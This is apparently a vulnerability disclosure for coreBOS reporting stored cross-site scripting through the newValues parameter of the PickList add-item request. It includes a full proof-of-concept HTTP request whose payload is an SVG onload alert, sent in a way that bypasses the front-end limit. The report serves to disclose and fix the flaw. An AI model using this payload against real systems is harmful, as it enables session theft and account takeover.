Description

There is a taint path can store payload into the database. visit http://127.0.0.1/corebos-master/index.php?action=PickList&module=PickList and click Add Item, the Add new entries here: can be tainted. Although there has a front limitation, but we can bypass it by modifying the request.

Proof of Concept

The tainted parameter is newValues. The PoC video is at https://drive.google.com/file/d/1W3FXEeGofwAENKszYgrGGKrr_xUas0DQ/view?usp=drivesdk

POST /corebos-master/index.php?action=PickListAjax&module=PickList&mode=add&file=PickListAction&fld_module=Accounts&fieldname=campaignrelstatus&newValues=%5B%22test<svg/onload=alert(/xsssssssssssssssssssss/);>test%22%5D&selectedRoles=%5B%22H2%22%2C%22H3%22%2C%22H4%22%2C%22H5%22%5D HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: text/plain;charset=UTF-8
Content-Length: 70
Referer: http://127.0.0.1/corebos-master/index.php?action=PickList&module=PickList
X-Requested-With: XMLHttpRequest
Origin: http://127.0.0.1
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Connection: close
Cookie: ck_login_id_vtiger=1; timezone=0; corebos_browsertabID=3817152672369736; phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D; phpbb2mysql_sid=966c2fe3f7855e8dd299fe17442437f7; phpbb2mysql_t=a%3A1%3A%7Bi%3A2%3Bi%3A1681955240%3B%7D; cb68ad0d4cc609476d862f5ee438ed70e0=pu80c91imrifdn10elmj65g0g6

__vt5rftk=sid:3b54d1d5d9885d0fc8f064a2039b1cb27d75d068,1681977108&null

Impact

This vulnerability has the potential to steal a user's cookie and gain unauthorized access to that user's account through the stolen cookie.